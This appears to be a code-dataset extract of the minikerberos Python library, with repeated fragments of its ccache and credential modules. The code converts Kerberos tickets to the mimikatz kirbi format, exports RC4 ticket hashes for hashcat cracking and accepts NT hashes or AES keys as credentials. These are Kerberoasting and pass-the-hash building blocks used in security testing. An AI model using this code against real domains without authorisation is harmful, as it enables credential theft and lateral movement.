c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_file | python | def to_file(self, filename):
with open(filename, 'wb') as f:
f.write(self.to_bytes()) | Writes the contents of the CCACHE object to a file | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L674-L679 | [
"def to_bytes(self):\n\tt = self.file_format_version.to_bytes(2, byteorder='big', signed=False)\n\n\tt_hdr = b''\n\tfor header in self.headers:\n\t\tt_hdr += header.to_bytes()\n\n\tt += len(t_hdr).to_bytes(2, byteorder='big', signed=False)\n\tt += t_hdr\n\n\tt += self.primary_principal.to_bytes()\n\tfor cred in sel... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
|
skelsec/minikerberos | minikerberos/common.py | print_table | python | def print_table(lines, separate_head=True):
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1))) | Prints a formatted table given a 2 dimensional array | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L246-L269 | null | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import secrets
import hashlib
import collections
from minikerberos.constants import *
from minikerberos.encryption import string_to_key, Enctype
from minikerberos.ccache import CCACHE
class KerberosSecretType(enum.Enum):
PASSWORD = 'PASSWORD'
PW = 'PW'
PASS = 'PASS'
NT = 'NT'
AES = 'AES'
RC4 = 'RC4'
DES = 'DES'
DES3 = 'DES3'
TDES = 'TDES'
CCACHE = 'CCACHE'
class KerberosCredential:
def __init__(self):
self.username = None
self.domain = None
self.password = None
self.nt_hash = None
self.lm_hash = None
self.kerberos_key_aes_256 = None
self.kerberos_key_aes_128 = None
self.kerberos_key_des = None
self.kerberos_key_rc4 = None
self.kerberos_key_des3 = None
self.ccache = None
def get_preferred_enctype(self, server_enctypes):
client_enctypes = self.get_supported_enctypes(as_int=False)
common_enctypes = list(set([s_enctype for s_enctype in server_enctypes]) & set(client_enctypes))
for c_enctype in client_enctypes:
if c_enctype in common_enctypes:
return c_enctype
raise Exception('No common supported enctypes! Server: %s Client: %s' % (
', '.join([s_enctype.name for s_enctype in server_enctypes]),
', '.join([c_enctype.name for c_enctype in client_enctypes])
)
)
def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name)
def get_supported_enctypes(self, as_int = True):
supp_enctypes = collections.OrderedDict()
if self.kerberos_key_aes_256:
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
if self.kerberos_key_aes_128:
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password:
supp_enctypes[EncryptionType.DES_CBC_CRC] = 1
supp_enctypes[EncryptionType.DES_CBC_MD4] = 1
supp_enctypes[EncryptionType.DES_CBC_MD5] = 1
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password or self.nt_hash or self.kerberos_key_rc4:
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
if self.kerberos_key_des:
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
if as_int == True:
return [etype.value for etype in supp_enctypes]
return [etype for etype in supp_enctypes]
@staticmethod
def add_args(parser):
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
' the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
@staticmethod
def from_args(args):
cred = KerberosCredential()
cred.from_target_string(args.target)
if args.hashes is not None:
cred.lm_hash, cred.nt_hash = args.hashes.split(':')
if args.aesKey is not None:
try:
bytes.fromhex(args.aesKey)
except Exception as e:
logging.exception('Kerberos AES key format incorrect!')
t = len(args.aesKey)
if t == 64:
cred.kerberos_key_aes_256 = args.aesKey.lower()
elif t == 32:
cred.kerberos_key_aes_128 = args.aesKey.lower()
else:
raise Exception('Kerberos AES key length incorrect!')
if args.k is True:
if cred.has_kerberos_secret() == False:
raise Exception('Trying to perform Kerberos authentication with no usable kerberos secrets!')
cred.force_kerberos = True
if args.no_pass == False and cred.has_secret() == False:
cred.password = getpass.getpass()
return cred
@staticmethod
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred
def __str__(self):
t = '===KerberosCredential===\r\n'
t += 'username: %s\r\n' % self.username
t += 'domain: %s\r\n' % self.domain
t += 'password: %s\r\n' % self.password
t += 'nt_hash: %s\r\n' % self.nt_hash
t += 'lm_hash: %s\r\n' % self.lm_hash
if self.kerberos_key_aes_256:
t += 'kerberos_key_aes_256: %s\r\n' % self.kerberos_key_aes_256
if self.kerberos_key_aes_128:
t += 'kerberos_key_aes_128: %s\r\n' % self.kerberos_key_aes_128
if self.kerberos_key_des:
t += 'kerberos_key_des: %s\r\n' % self.kerberos_key_des
if self.kerberos_key_rc4:
t += 'kerberos_key_rc4: %s\r\n' % self.kerberos_key_rc4
if self.kerberos_key_des3:
t += 'kerberos_key_des3: %s\r\n' % self.kerberos_key_des3
return t
class KerberosTarget:
def __init__(self):
self.username = None
self.service = None #the service we are trying to get a ticket for (eg. cifs/mssql...)
self.domain = None #the kerberos realm
def get_principalname(self):
if self.service:
return [self.service, self.username]
return [self.username]
def get_formatted_pname(self):
if self.service:
return '%s/%s@%s' % (self.service, self.username, self.domain)
return '%s@%s' % (self.username, self.domain)
def print_table(lines, separate_head=True):
"""Prints a formatted table given a 2 dimensional array"""
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1)))
|
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.get_key_for_enctype | python | def get_key_for_enctype(self, etype):
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name) | Returns the encryption key bytes for the enctryption type. | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L54-L101 | [
"def string_to_key(enctype, string, salt, params=None):\n\te = _get_enctype_profile(enctype)\n\treturn e.string_to_key(string, salt, params)\n"
] | class KerberosCredential:
def __init__(self):
self.username = None
self.domain = None
self.password = None
self.nt_hash = None
self.lm_hash = None
self.kerberos_key_aes_256 = None
self.kerberos_key_aes_128 = None
self.kerberos_key_des = None
self.kerberos_key_rc4 = None
self.kerberos_key_des3 = None
self.ccache = None
def get_preferred_enctype(self, server_enctypes):
client_enctypes = self.get_supported_enctypes(as_int=False)
common_enctypes = list(set([s_enctype for s_enctype in server_enctypes]) & set(client_enctypes))
for c_enctype in client_enctypes:
if c_enctype in common_enctypes:
return c_enctype
raise Exception('No common supported enctypes! Server: %s Client: %s' % (
', '.join([s_enctype.name for s_enctype in server_enctypes]),
', '.join([c_enctype.name for c_enctype in client_enctypes])
)
)
def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name)
def get_supported_enctypes(self, as_int = True):
supp_enctypes = collections.OrderedDict()
if self.kerberos_key_aes_256:
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
if self.kerberos_key_aes_128:
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password:
supp_enctypes[EncryptionType.DES_CBC_CRC] = 1
supp_enctypes[EncryptionType.DES_CBC_MD4] = 1
supp_enctypes[EncryptionType.DES_CBC_MD5] = 1
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password or self.nt_hash or self.kerberos_key_rc4:
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
if self.kerberos_key_des:
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
if as_int == True:
return [etype.value for etype in supp_enctypes]
return [etype for etype in supp_enctypes]
@staticmethod
def add_args(parser):
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
' the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
@staticmethod
def from_args(args):
cred = KerberosCredential()
cred.from_target_string(args.target)
if args.hashes is not None:
cred.lm_hash, cred.nt_hash = args.hashes.split(':')
if args.aesKey is not None:
try:
bytes.fromhex(args.aesKey)
except Exception as e:
logging.exception('Kerberos AES key format incorrect!')
t = len(args.aesKey)
if t == 64:
cred.kerberos_key_aes_256 = args.aesKey.lower()
elif t == 32:
cred.kerberos_key_aes_128 = args.aesKey.lower()
else:
raise Exception('Kerberos AES key length incorrect!')
if args.k is True:
if cred.has_kerberos_secret() == False:
raise Exception('Trying to perform Kerberos authentication with no usable kerberos secrets!')
cred.force_kerberos = True
if args.no_pass == False and cred.has_secret() == False:
cred.password = getpass.getpass()
return cred
@staticmethod
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
